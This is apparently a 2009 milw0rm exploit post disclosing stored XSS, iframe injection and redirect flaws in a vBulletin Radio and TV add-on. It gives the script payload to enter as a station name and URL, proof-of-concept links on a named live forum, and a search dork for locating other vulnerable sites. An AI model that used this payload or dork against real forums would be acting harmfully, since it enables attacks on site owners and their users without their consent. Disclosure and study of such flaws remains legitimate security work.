38 lines
No EOL
940 B
Text
38 lines
No EOL
940 B
Text
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability
|
|
|
|
About:-
|
|
|
|
Radio and TV Add-on will add a radio and TV library to your forum.
|
|
|
|
Features:-
|
|
|
|
- Users can add / delete / edit own stations
|
|
|
|
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2
|
|
|
|
Note:-
|
|
|
|
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
|
|
where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>
|
|
and URL "><script>alert(String.fromCharCode(88,83,83))</script>
|
|
|
|
|
|
Poc: XSS
|
|
|
|
http://www.musicadigitale.net/forum/radioandtv.php?station=92
|
|
|
|
Poc: Iframe
|
|
|
|
http://www.musicadigitale.net/forum/radioandtv.php?station=93
|
|
|
|
Poc: Redirect
|
|
|
|
http://www.musicadigitale.net/forum/radioandtv.php?station=94
|
|
|
|
dorks:- inurl:radioandtv.php
|
|
|
|
Bug founded by d3v1l [Avram Marius]
|
|
|
|
Date: 14.06.2009
|
|
|
|
# milw0rm.com [2009-06-15] |